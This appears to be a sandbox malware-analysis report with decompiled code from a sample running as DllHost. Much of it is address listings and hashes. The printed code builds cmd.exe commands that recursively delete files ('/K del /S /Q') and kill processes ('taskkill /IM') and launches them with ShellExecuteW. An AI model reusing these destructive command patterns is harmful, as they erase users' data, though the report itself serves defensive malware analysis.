                                                                                                                                                              0x7ff7191b4a56
                                                                                                                                                              0x7ff7191b4a5b
                                                                                                                                                              0x7ff7191b4a5e
                                                                                                                                                              0x7ff7191b4a6a
                                                                                                                                                              0x7ff7191b4a72
                                                                                                                                                              0x7ff7191b4a74
                                                                                                                                                              0x7ff7191b4a7b
                                                                                                                                                              0x7ff7191b4a7d
                                                                                                                                                              0x7ff7191b4a81
                                                                                                                                                              0x7ff7191b4a8d
                                                                                                                                                              0x7ff7191b4a92
                                                                                                                                                              0x7ff7191b4a97
                                                                                                                                                              0x7ff7191b4a9d
                                                                                                                                                              0x7ff7191b4aa3
                                                                                                                                                              0x7ff7191b4aae
                                                                                                                                                              0x7ff7191b4ab8
                                                                                                                                                              0x7ff7191b4ac2
                                                                                                                                                              0x7ff7191b4ac8
                                                                                                                                                              0x7ff7191b4ad8
                                                                                                                                                              0x7ff7191b4add
                                                                                                                                                              0x7ff7191b4ae1
                                                                                                                                                              0x7ff7191b4ae5
                                                                                                                                                              0x7ff7191b4ae9
                                                                                                                                                              0x7ff7191b4aec
                                                                                                                                                              0x7ff7191b4af0
                                                                                                                                                              0x7ff7191b4af4
                                                                                                                                                              0x7ff7191b4af8
                                                                                                                                                              0x7ff7191b4afc
                                                                                                                                                              0x7ff7191b4b04
                                                                                                                                                              0x7ff7191b4b07
                                                                                                                                                              0x7ff7191b4b10
                                                                                                                                                              0x7ff7191b4b24
                                                                                                                                                              0x7ff7191b4b39
                                                                                                                                                              0x7ff7191b4b3f
                                                                                                                                                              0x7ff7191b4b44
                                                                                                                                                              0x7ff7191b4b49
                                                                                                                                                              0x7ff7191b4b52
                                                                                                                                                              0x7ff7191b4b60
                                                                                                                                                              0x7ff7191b4b6d
                                                                                                                                                              0x7ff7191b4b74
                                                                                                                                                              0x7ff7191b4b81
                                                                                                                                                              0x7ff7191b4b8f
                                                                                                                                                              0x7ff7191b4b94
                                                                                                                                                              0x7ff7191b4b9c
                                                                                                                                                              0x7ff7191b4ba3
                                                                                                                                                              0x7ff7191b4ba8
                                                                                                                                                              0x7ff7191b4bb3
                                                                                                                                                              0x7ff7191b4bc1
                                                                                                                                                              0x7ff7191b4bc7
                                                                                                                                                              0x7ff7191b4bd7
                                                                                                                                                              0x7ff7191b4bdc
                                                                                                                                                              0x7ff7191b4bdf
                                                                                                                                                              0x7ff7191b4be3
                                                                                                                                                              0x7ff7191b4be7
                                                                                                                                                              0x7ff7191b4beb
                                                                                                                                                              0x7ff7191b4bef
                                                                                                                                                              0x7ff7191b4bf7
                                                                                                                                                              0x7ff7191b4bfa
                                                                                                                                                              0x7ff7191b4c03
                                                                                                                                                              0x7ff7191b4c17
                                                                                                                                                              0x7ff7191b4c2c
                                                                                                                                                              0x7ff7191b4c32
                                                                                                                                                              0x7ff7191b4c39
                                                                                                                                                              0x7ff7191b4c46
                                                                                                                                                              0x7ff7191b4c54
                                                                                                                                                              0x7ff7191b4c59
                                                                                                                                                              0x7ff7191b4c68
                                                                                                                                                              0x7ff7191b4c6d
                                                                                                                                                              0x7ff7191b4c78
                                                                                                                                                              0x7ff7191b4c8c
                                                                                                                                                              0x7ff7191b4c96
                                                                                                                                                              0x7ff7191b4ca5
                                                                                                                                                              0x7ff7191b4caa
                                                                                                                                                              0x7ff7191b4caf
                                                                                                                                                              0x7ff7191b4cc4
                                                                                                                                                              0x7ff7191b4cca
                                                                                                                                                              0x7ff7191b4cd2
                                                                                                                                                              0x7ff7191b4ce5
                                                                                                                                                              0x7ff7191b4cfa
                                                                                                                                                              0x7ff7191b4d00
                                                                                                                                                              0x7ff7191b4d05
                                                                                                                                                              0x7ff7191b4d09
                                                                                                                                                              0x7ff7191b4d11
                                                                                                                                                              0x7ff7191b4d15
                                                                                                                                                              0x7ff7191b4d1d
                                                                                                                                                              0x7ff7191b4d30
                                                                                                                                                              0x7ff7191b4d45
                                                                                                                                                              0x7ff7191b4d4b
                                                                                                                                                              0x7ff7191b4d50
                                                                                                                                                              0x7ff7191b4d54
                                                                                                                                                              0x7ff7191b4d5c
                                                                                                                                                              0x7ff7191b4d60
                                                                                                                                                              0x7ff7191b4d68
                                                                                                                                                              0x7ff7191b4d80
                                                                                                                                                              0x7ff7191b4d95
                                                                                                                                                              0x7ff7191b4d9b
                                                                                                                                                              0x7ff7191b4da0
                                                                                                                                                              0x7ff7191b4da4
                                                                                                                                                              0x7ff7191b4dac
                                                                                                                                                              0x7ff7191b4db1
                                                                                                                                                              0x7ff7191b4db9
                                                                                                                                                              0x7ff7191b4dcc
                                                                                                                                                              0x7ff7191b4de1
                                                                                                                                                              0x7ff7191b4de7
                                                                                                                                                              0x7ff7191b4dec
                                                                                                                                                              0x7ff7191b4df0
                                                                                                                                                              0x7ff7191b4df8
                                                                                                                                                              0x7ff7191b4dfc
                                                                                                                                                              0x7ff7191b4e04
                                                                                                                                                              0x7ff7191b4e17
                                                                                                                                                              0x7ff7191b4e2c
                                                                                                                                                              0x7ff7191b4e32
                                                                                                                                                              0x7ff7191b4e40
                                                                                                                                                              0x7ff7191b4e53
                                                                                                                                                              0x7ff7191b4e5b
                                                                                                                                                              0x7ff7191b4e6f
                                                                                                                                                              0x7ff7191b4e7f
                                                                                                                                                              0x7ff7191b4e8a
                                                                                                                                                              0x7ff7191b4e98
                                                                                                                                                              0x7ff7191b4e9e
                                                                                                                                                              0x7ff7191b4ea6
                                                                                                                                                              0x7ff7191b4eb5
                                                                                                                                                              0x7ff7191b4eca
                                                                                                                                                              0x7ff7191b4ecf
                                                                                                                                                              0x7ff7191b4ed4
                                                                                                                                                              0x7ff7191b4ed8
                                                                                                                                                              0x7ff7191b4ee0
                                                                                                                                                              0x7ff7191b4f0e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$Concurrency::cancel_current_taskExecuteShellSleep
                                                                                                                                                              • String ID: /F && exit$/K taskkill /IM $\name.txt$\old.exe$cmd.exe$open
                                                                                                                                                              • API String ID: 2008784991-3313576588
                                                                                                                                                              • Opcode ID: e7b3b3fb6c749e51e4e6f481d7e3a6b51ed6d319e1b00450fd9373cbf1f7c2dd
                                                                                                                                                              • Instruction ID: 475cc23873954d8b871fd7d53e46e352721fe22d1010edb87f67f56457cdc49c
                                                                                                                                                              • Opcode Fuzzy Hash: e7b3b3fb6c749e51e4e6f481d7e3a6b51ed6d319e1b00450fd9373cbf1f7c2dd
                                                                                                                                                              • Instruction Fuzzy Hash: 7632AF22B14B8585FB00EF64E4943ED6772FB44BACF808225DA5E17AE9DF78D186D310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B4FF0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 168COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 26%
                                                                                                                                                              			E00007FF77FF7191B4FF0(long long __rbx, long long __rcx, long long __rsi) {
				void* __rdi;
				void* __rbp;
				void* _t75;
				signed long long _t97;
				void* _t102;
				char* _t112;
				signed long long _t121;
				signed long long _t142;
				intOrPtr _t145;
				intOrPtr _t148;
				void* _t151;
				char* _t152;
				void* _t156;
				void* _t158;
				void* _t159;
				void* _t161;
				signed long long _t162;
				void* _t164;
				long long _t165;
				void* _t171;
				void* _t173;
				signed long long _t174;
				void* _t176;

				_t154 = __rsi;
				_t110 = __rbx;
				 *((long long*)(_t161 + 0x10)) = __rbx;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t159 = _t161 - 0x47;
				_t162 = _t161 - 0x90;
				_t97 =  *0x192190a0; // 0x590452ce5669
				 *(_t159 + 0x37) = _t97 ^ _t162;
				_t152 = __rcx;
				 *((long long*)(_t159 - 0x11)) = __rcx;
				r14d = 0;
				 *(_t159 + 0x17) = _t174;
				 *(_t159 + 0x27) = _t174;
				 *((long long*)(_t159 + 0x2f)) = 0xf;
				 *(_t159 + 0x17) = r14b;
				_t10 = _t174 + 0xd; // 0xd
				r8d = _t10;
				E00007FF77FF7191BA9A0(_t159 + 0x17, "/K del /S /Q ", _t164);
				if ( *((long long*)(_t152 + 0x18)) - 0x10 < 0) goto 0x191b5058;
				_t165 =  *(_t152 + 0x10);
				E00007FF77FF7191BAB00(__rbx, _t159 + 0x17, __rsi, _t165, _t174);
				r8d = 8;
				E00007FF77FF7191BAB00(_t110, _t159 + 0x17, _t154, _t165, _t151);
				_t138 =  >=  ?  *(_t159 + 0x17) : _t159 + 0x17;
				_t156 =  *(_t159 + 0x27) + ( >=  ?  *(_t159 + 0x17) : _t159 + 0x17);
				_t112 =  >=  ?  *(_t159 + 0x17) : _t159 + 0x17;
				 *(_t159 - 9) = _t174;
				 *(_t159 + 7) = _t174;
				r8d = 7;
				 *((long long*)(_t159 + 0xf)) = _t165;
				if (_t156 - _t112 - 8 < 0) goto 0x191b50d3;
				E00007FF77FF7191BC130(_t159 - 9, _t156 - _t112, _t152, _t159, _t176);
				_t121 = _t174;
				 *(_t159 + 7) = _t121;
				 *((long long*)(_t159 - 0x19)) = _t159 - 9;
				if (_t112 == _t156) goto 0x191b5126;
				r9d =  *_t112;
				if (_t121 -  *((intOrPtr*)(_t159 + 0xf)) >= 0) goto 0x191b510b;
				_t31 = _t121 + 1; // 0x1
				 *(_t159 + 7) = _t31;
				_t102 =  >=  ?  *(_t159 - 9) : _t159 - 9;
				 *((intOrPtr*)(_t102 + _t121 * 2)) = r9w;
				 *(_t102 + 2 + _t121 * 2) = r14w;
				goto 0x191b5114;
				E00007FF77FF7191BC2A0(_t159 - 9, _t152, _t159, _t173, _t176);
				if (_t112 + 1 == _t156) goto 0x191b5126;
				goto 0x191b50e0;
				_t171 =  >=  ?  *(_t159 - 9) : _t159 - 9;
				 *((intOrPtr*)(_t162 + 0x28)) = r14d;
				 *(_t162 + 0x20) = _t174;
				_t75 = ShellExecuteW(_t158, ??, ??, ??, ??); // executed
				_t142 =  *((intOrPtr*)(_t159 + 0xf));
				if (_t142 - 8 < 0) goto 0x191b5193;
				if (2 + _t142 * 2 - 0x1000 < 0) goto 0x191b518e;
				if ( *(_t159 - 9) -  *((intOrPtr*)( *(_t159 - 9) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b5260;
				0x191d23d0();
				 *(_t159 + 7) = _t174;
				 *((long long*)(_t159 + 0xf)) = 7;
				 *(_t159 - 9) = r14w;
				_t145 =  *((intOrPtr*)(_t159 + 0x2f));
				if (_t145 - 0x10 < 0) goto 0x191b51db;
				if (_t145 + 1 - 0x1000 < 0) goto 0x191b51d6;
				if ( *(_t159 + 0x17) -  *((intOrPtr*)( *(_t159 + 0x17) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b5254;
				0x191d23d0();
				 *(_t159 + 0x27) = _t174;
				 *((long long*)(_t159 + 0x2f)) = 0xf;
				 *(_t159 + 0x17) = 0;
				_t148 =  *((intOrPtr*)(_t152 + 0x18));
				if (_t148 - 0x10 < 0) goto 0x191b5221;
				if (_t148 + 1 - 0x1000 < 0) goto 0x191b521c;
				if ( *_t152 -  *((intOrPtr*)( *_t152 - 8)) - 8 - 0x1f > 0) goto 0x191b525a;
				0x191d23d0();
				 *(_t152 + 0x10) = _t174;
				 *((long long*)(_t152 + 0x18)) = 0xf;
				 *_t152 = 0;
				return E00007FF77FF7191D23B0(_t75, 0,  *(_t159 + 0x37) ^ _t162);
			}


























                                                                                                                                                              0x7ff7191b4ff0
                                                                                                                                                              0x7ff7191b4ff0
                                                                                                                                                              0x7ff7191b4ff0
                                                                                                                                                              0x7ff7191b4ff5
                                                                                                                                                              0x7ff7191b4ffe
                                                                                                                                                              0x7ff7191b5003
                                                                                                                                                              0x7ff7191b500a
                                                                                                                                                              0x7ff7191b5014
                                                                                                                                                              0x7ff7191b5018
                                                                                                                                                              0x7ff7191b501b
                                                                                                                                                              0x7ff7191b501f
                                                                                                                                                              0x7ff7191b5022
                                                                                                                                                              0x7ff7191b5026
                                                                                                                                                              0x7ff7191b502a
                                                                                                                                                              0x7ff7191b5032
                                                                                                                                                              0x7ff7191b5036
                                                                                                                                                              0x7ff7191b5036
                                                                                                                                                              0x7ff7191b5045
                                                                                                                                                              0x7ff7191b5053
                                                                                                                                                              0x7ff7191b5058
                                                                                                                                                              0x7ff7191b5060
                                                                                                                                                              0x7ff7191b5065
                                                                                                                                                              0x7ff7191b5076
                                                                                                                                                              0x7ff7191b5084
                                                                                                                                                              0x7ff7191b508d
                                                                                                                                                              0x7ff7191b5099
                                                                                                                                                              0x7ff7191b509e
                                                                                                                                                              0x7ff7191b50a5
                                                                                                                                                              0x7ff7191b50a9
                                                                                                                                                              0x7ff7191b50af
                                                                                                                                                              0x7ff7191b50bd
                                                                                                                                                              0x7ff7191b50c3
                                                                                                                                                              0x7ff7191b50c8
                                                                                                                                                              0x7ff7191b50cb
                                                                                                                                                              0x7ff7191b50d7
                                                                                                                                                              0x7ff7191b50de
                                                                                                                                                              0x7ff7191b50e0
                                                                                                                                                              0x7ff7191b50e7
                                                                                                                                                              0x7ff7191b50e9
                                                                                                                                                              0x7ff7191b50ed
                                                                                                                                                              0x7ff7191b50f9
                                                                                                                                                              0x7ff7191b50fe
                                                                                                                                                              0x7ff7191b5103
                                                                                                                                                              0x7ff7191b5109
                                                                                                                                                              0x7ff7191b510f
                                                                                                                                                              0x7ff7191b511e
                                                                                                                                                              0x7ff7191b5124
                                                                                                                                                              0x7ff7191b512e
                                                                                                                                                              0x7ff7191b5133
                                                                                                                                                              0x7ff7191b5138
                                                                                                                                                              0x7ff7191b514d
                                                                                                                                                              0x7ff7191b5153
                                                                                                                                                              0x7ff7191b515b
                                                                                                                                                              0x7ff7191b5173
                                                                                                                                                              0x7ff7191b5188
                                                                                                                                                              0x7ff7191b518e
                                                                                                                                                              0x7ff7191b5193
                                                                                                                                                              0x7ff7191b5197
                                                                                                                                                              0x7ff7191b519f
                                                                                                                                                              0x7ff7191b51a4
                                                                                                                                                              0x7ff7191b51ac
                                                                                                                                                              0x7ff7191b51bf
                                                                                                                                                              0x7ff7191b51d4
                                                                                                                                                              0x7ff7191b51d6
                                                                                                                                                              0x7ff7191b51db
                                                                                                                                                              0x7ff7191b51df
                                                                                                                                                              0x7ff7191b51e7
                                                                                                                                                              0x7ff7191b51eb
                                                                                                                                                              0x7ff7191b51f3
                                                                                                                                                              0x7ff7191b5202
                                                                                                                                                              0x7ff7191b5217
                                                                                                                                                              0x7ff7191b521c
                                                                                                                                                              0x7ff7191b5221
                                                                                                                                                              0x7ff7191b5225
                                                                                                                                                              0x7ff7191b522d
                                                                                                                                                              0x7ff7191b5253

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ExecuteShell
                                                                                                                                                              • String ID: && exit$/K del /S /Q $cmd.exe$open
                                                                                                                                                              • API String ID: 4120902618-1538420477
                                                                                                                                                              • Opcode ID: 175189950b467f366b0f9083fd1c3a47e9bf76eb8bbd65ad52258866c47fb5f9
                                                                                                                                                              • Instruction ID: f12d40fedb017701de6bcef7610aaaff88664823389b31ebfebbcf65bf0a7ab2
                                                                                                                                                              • Opcode Fuzzy Hash: 175189950b467f366b0f9083fd1c3a47e9bf76eb8bbd65ad52258866c47fb5f9
                                                                                                                                                              • Instruction Fuzzy Hash: 35717D72B04A4199FB00EF64E4543ECA372FB047ACF804535EA1E17A99DF38D69AD350
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F4030 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 979 7ff7191f4030-7ff7191f40a3 call 7ff7191f3c14 982 7ff7191f40a5-7ff7191f40ae call 7ff7191dc834 979->982 983 7ff7191f40bd-7ff7191f40c7 call 7ff7191eac2c 979->983 990 7ff7191f40b1-7ff7191f40b8 call 7ff7191dc854 982->990 988 7ff7191f40e2-7ff7191f414b CreateFileW 983->988 989 7ff7191f40c9-7ff7191f40e0 call 7ff7191dc834 call 7ff7191dc854 983->989 992 7ff7191f414d-7ff7191f4153 988->992 993 7ff7191f41c8-7ff7191f41d3 GetFileType 988->993 989->990 1006 7ff7191f43f6-7ff7191f4416 990->1006 996 7ff7191f4195-7ff7191f41c3 GetLastError call 7ff7191dc7e4 992->996 997 7ff7191f4155-7ff7191f4159 992->997 999 7ff7191f41d5-7ff7191f4210 GetLastError call 7ff7191dc7e4 CloseHandle 993->999 1000 7ff7191f4226-7ff7191f422d 993->1000 996->990 997->996 1004 7ff7191f415b-7ff7191f4193 CreateFileW 997->1004 999->990 1013 7ff7191f4216-7ff7191f4221 call 7ff7191dc854 999->1013 1002 7ff7191f4235-7ff7191f4238 1000->1002 1003 7ff7191f422f-7ff7191f4233 1000->1003 1010 7ff7191f423e-7ff7191f428f call 7ff7191eab44 1002->1010 1011 7ff7191f423a 1002->1011 1003->1010 1004->993 1004->996 1018 7ff7191f4291-7ff7191f429d call 7ff7191f3e20 1010->1018 1019 7ff7191f42ae-7ff7191f42de call 7ff7191f3980 1010->1019 1011->1010 1013->990 1018->1019 1026 7ff7191f429f 1018->1026 1024 7ff7191f42a1-7ff7191f42a9 call 7ff7191e6c80 1019->1024 1025 7ff7191f42e0-7ff7191f4323 1019->1025 1024->1006 1028 7ff7191f4345-7ff7191f4350 1025->1028 1029 7ff7191f4325-7ff7191f4329 1025->1029 1026->1024 1032 7ff7191f4356-7ff7191f435a 1028->1032 1033 7ff7191f43f4 1028->1033 1029->1028 1031 7ff7191f432b-7ff7191f4340 1029->1031 1031->1028 1032->1033 1034 7ff7191f4360-7ff7191f43a5 CloseHandle CreateFileW 1032->1034 1033->1006 1035 7ff7191f43da-7ff7191f43ef 1034->1035 1036 7ff7191f43a7-7ff7191f43d5 GetLastError call 7ff7191dc7e4 call 7ff7191ead6c 1034->1036 1035->1033 1036->1035
                                                                                                                                                              C-Code - Quality: 41%
                                                                                                                                                              			E00007FF77FF7191F4030(void* __ecx, void* __edi, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __r8) {
				void* __rbp;
				signed int _t152;
				long _t165;
				void* _t169;
				intOrPtr _t171;
				intOrPtr _t174;
				void* _t185;
				signed int _t188;
				signed int _t189;
				void* _t213;
				intOrPtr* _t237;
				intOrPtr* _t240;
				long long _t252;
				long long _t260;
				signed long long _t266;
				signed long long _t280;
				intOrPtr _t281;
				signed long long _t282;
				signed long long _t301;
				signed int* _t306;
				long long _t309;
				void* _t311;
				void* _t312;
				intOrPtr* _t314;
				void* _t315;
				void* _t323;
				void* _t325;
				void* _t329;
				void* _t333;

				_t213 = __edi;
				_t237 = _t314;
				 *((long long*)(_t237 + 8)) = __rbx;
				 *((long long*)(_t237 + 0x10)) = __rsi;
				 *((long long*)(_t237 + 0x20)) = __rdi;
				 *((long long*)(_t237 + 0x18)) = __r8;
				_t312 = _t237 - 0x47;
				_t315 = _t314 - 0xb0;
				r12d = r9d;
				_t260 = __r8;
				r9d =  *(_t312 + 0x77);
				_t306 = __rdx;
				r8d =  *(_t312 + 0x6f);
				_t309 = __rcx;
				E00007FF77FF7191F3C14(r12d, __eflags, _t237, __r8, _t312 - 1, _t312);
				asm("movups xmm0, [eax]");
				asm("movsd xmm1, [eax+0x10]");
				asm("movups [ebp-0x49], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				asm("movsd [ebp-0x31], xmm1");
				asm("movsd [ebp-0x39], xmm1");
				 *(_t312 - 0x21) = _t333 >> 0x20;
				if (r15d != 0xffffffff) goto 0x191f40bd;
				E00007FF77FF7191DC834(_t237);
				 *_t237 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF77FF7191DC854(_t237);
				goto 0x191f43f6;
				_t152 = E00007FF77FF7191EAC2C(r12d, _t237, __r8, _t312 - 1, __rdx, __rdx, _t309);
				 *__rdx = _t152;
				if (_t152 != 0xffffffff) goto 0x191f40e2;
				E00007FF77FF7191DC834(_t237);
				 *_t237 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF77FF7191DC854(_t237);
				 *_t237 = 0x18;
				goto 0x191f40b1;
				r8d = r15d;
				r14d = r14d |  *(_t312 - 0x39);
				 *_t309 = 1;
				 *((long long*)(_t315 + 0x30)) = _t309;
				 *(_t315 + 0x28) = r14d;
				 *((intOrPtr*)(_t315 + 0x20)) =  *((intOrPtr*)(_t312 - 0x41));
				 *((intOrPtr*)(_t312 - 0x19)) = 0x18;
				 *((long long*)(_t312 - 0x11)) = _t309;
				 *(_t312 - 9) =  !(r12d >> 7) & 0x00000001;
				 *(_t312 - 0x29) =  *(_t312 - 0x39) >> 0x20;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				_t188 =  *(_t312 - 0x45);
				if (_t237 != 0xffffffff) goto 0x191f41c8;
				if ((_t188 & 0xc0000000) != 0xc0000000) goto 0x191f4195;
				if ((r12b & 0x00000001) == 0) goto 0x191f4195;
				 *((long long*)(_t315 + 0x30)) = _t309;
				asm("btr ebx, 0x1f");
				 *(_t312 - 0x45) = _t188;
				r8d = r15d;
				 *(_t315 + 0x28) = r14d;
				 *((intOrPtr*)(_t315 + 0x20)) =  *((intOrPtr*)(_t312 - 0x41));
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t237 != 0xffffffff) goto 0x191f41c8;
				_t266 =  *__rdx;
				_t240 =  *((intOrPtr*)(0x1921b700 + (_t266 >> 6) * 8));
				 *(_t240 + 0x38 + (_t266 + _t266 * 8) * 8) =  *(_t240 + 0x38 + (_t266 + _t266 * 8) * 8) & 0x000000fe;
				E00007FF77FF7191DC7E4(GetLastError(), _t240, _t260);
				goto 0x191f40b1;
				_t165 = GetFileType(_t333); // executed
				if (_t165 != 0) goto 0x191f4226;
				_t189 = GetLastError();
				E00007FF77FF7191DC7E4(_t166, _t240, _t260);
				 *( *((intOrPtr*)(0x1921b700 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) =  *( *((intOrPtr*)(0x1921b700 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) & 0x000000fe;
				CloseHandle(_t329);
				if (_t189 != 0) goto 0x191f40b1;
				_t169 = E00007FF77FF7191DC854(_t240);
				 *_t240 = 0xd;
				goto 0x191f40b1;
				r14b =  *(_t312 - 0x49);
				if (_t169 != 2) goto 0x191f4235;
				r14b = r14b | 0x00000040;
				goto 0x191f423e;
				if (_t169 != 3) goto 0x191f423e;
				r14b = r14b | 0x00000008;
				E00007FF77FF7191EAB44(_t169, _t189,  *__rdx, _t260, _t237, __rdx, _t309, _t312, _t325, _t323);
				r14b = r14b | 0x00000001;
				 *(_t312 - 0x49) = r14b;
				 *( *((intOrPtr*)(0x1921b700 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) = r14b;
				 *((intOrPtr*)( *((intOrPtr*)(0x1921b700 + ( *__rdx >> 6) * 8)) + 0x39 + ( *__rdx +  *__rdx * 8) * 8)) = sil;
				if ((r12b & 0x00000002) == 0) goto 0x191f42ae;
				_t171 = E00007FF77FF7191F3E20(_t189,  *__rdx, r12d & 0x0000003f, _t260, _t312 - 0x19);
				 *((intOrPtr*)(_t312 - 0x4d)) = _t171;
				if (_t171 == 0) goto 0x191f42ae;
				E00007FF77FF7191E6C80( *_t306, r12d & 0x0000003f, _t213,  *((intOrPtr*)(0x1921b700 + ( *__rdx >> 6) * 8)), _t260);
				goto 0x191f43f6;
				asm("movups xmm0, [ebp-0x49]");
				asm("movsd xmm1, [ebp-0x31]");
				r8d = r12d;
				asm("movaps [ebp-0x1], xmm0");
				 *((intOrPtr*)(_t312 - 0x51)) = sil;
				asm("movsd [ebp+0xf], xmm1");
				_t174 = E00007FF77FF7191F3980( *_t306, _t260, _t312 - 1, _t309, _t312 - 0x51);
				_t277 =  *_t306;
				 *((intOrPtr*)(_t312 - 0x4d)) = _t174;
				if (_t174 != 0) goto 0x191f42a1;
				 *((char*)( *((intOrPtr*)(0x1921b700 + ( *_t306 >> 6) * 8)) + 0x39 + ( *_t306 + _t277 * 8) * 8)) =  *((intOrPtr*)(_t312 - 0x51));
				_t280 =  *_t306;
				_t301 = _t280 + _t280 * 8;
				_t281 =  *((intOrPtr*)(0x1921b700 + (_t280 >> 6) * 8));
				 *(_t281 + 0x3d + _t301 * 8) =  *(_t281 + 0x3d + _t301 * 8) & 0x000000fe;
				 *(_t281 + 0x3d + _t301 * 8) =  *(_t281 + 0x3d + _t301 * 8) | r12d >> 0x00000010 & 0x00000001;
				if ((r14b & 0x00000048) != 0) goto 0x191f4345;
				if ((r12b & 0x00000008) == 0) goto 0x191f4345;
				_t282 =  *_t306;
				_t252 =  *((intOrPtr*)(0x1921b700 + (_t282 >> 6) * 8));
				 *(_t252 + 0x38 + (_t282 + _t282 * 8) * 8) =  *(_t252 + 0x38 + (_t282 + _t282 * 8) * 8) | 0x00000020;
				if ((_t189 & 0xc0000000) != 0xc0000000) goto 0x191f43f4;
				if ((r12b & 0x00000001) == 0) goto 0x191f43f4;
				CloseHandle(_t311);
				r8d =  *(_t312 - 0x21);
				asm("btr ebx, 0x1f");
				 *((long long*)(_t315 + 0x30)) = _t309;
				 *(_t315 + 0x28) = 0xc0000000;
				 *((intOrPtr*)(_t315 + 0x20)) =  *((intOrPtr*)(_t312 - 0x41));
				 *(_t312 - 0x45) = _t189;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t252 != 0xffffffff) goto 0x191f43da;
				_t185 = E00007FF77FF7191DC7E4(GetLastError(), _t252, _t260);
				 *( *((intOrPtr*)(0x1921b700 + ( *_t306 >> 6) * 8)) + 0x38 + ( *_t306 +  *_t306 * 8) * 8) =  *( *((intOrPtr*)(0x1921b700 + ( *_t306 >> 6) * 8)) + 0x38 + ( *_t306 +  *_t306 * 8) * 8) & 0x000000fe;
				E00007FF77FF7191EAD6C(_t185, _t189,  *_t306, _t260, _t306, _t309);
				goto 0x191f40b1;
				 *((long long*)( *((intOrPtr*)(0x1921b700 + ( *_t306 >> 6) * 8)) + 0x28 + ( *_t306 +  *_t306 * 8) * 8)) = _t252;
				return 0;
			}
































                                                                                                                                                              0x7ff7191f4030
                                                                                                                                                              0x7ff7191f4030
                                                                                                                                                              0x7ff7191f4033
                                                                                                                                                              0x7ff7191f4037
                                                                                                                                                              0x7ff7191f403b
                                                                                                                                                              0x7ff7191f403f
                                                                                                                                                              0x7ff7191f404c
                                                                                                                                                              0x7ff7191f4050
                                                                                                                                                              0x7ff7191f4057
                                                                                                                                                              0x7ff7191f405a
                                                                                                                                                              0x7ff7191f405d
                                                                                                                                                              0x7ff7191f4061
                                                                                                                                                              0x7ff7191f4064
                                                                                                                                                              0x7ff7191f4068
                                                                                                                                                              0x7ff7191f4072
                                                                                                                                                              0x7ff7191f4077
                                                                                                                                                              0x7ff7191f407a
                                                                                                                                                              0x7ff7191f407f
                                                                                                                                                              0x7ff7191f4083
                                                                                                                                                              0x7ff7191f4088
                                                                                                                                                              0x7ff7191f408d
                                                                                                                                                              0x7ff7191f4096
                                                                                                                                                              0x7ff7191f409b
                                                                                                                                                              0x7ff7191f40a3
                                                                                                                                                              0x7ff7191f40a5
                                                                                                                                                              0x7ff7191f40ac
                                                                                                                                                              0x7ff7191f40ae
                                                                                                                                                              0x7ff7191f40b1
                                                                                                                                                              0x7ff7191f40b8
                                                                                                                                                              0x7ff7191f40bd
                                                                                                                                                              0x7ff7191f40c2
                                                                                                                                                              0x7ff7191f40c7
                                                                                                                                                              0x7ff7191f40c9
                                                                                                                                                              0x7ff7191f40d0
                                                                                                                                                              0x7ff7191f40d2
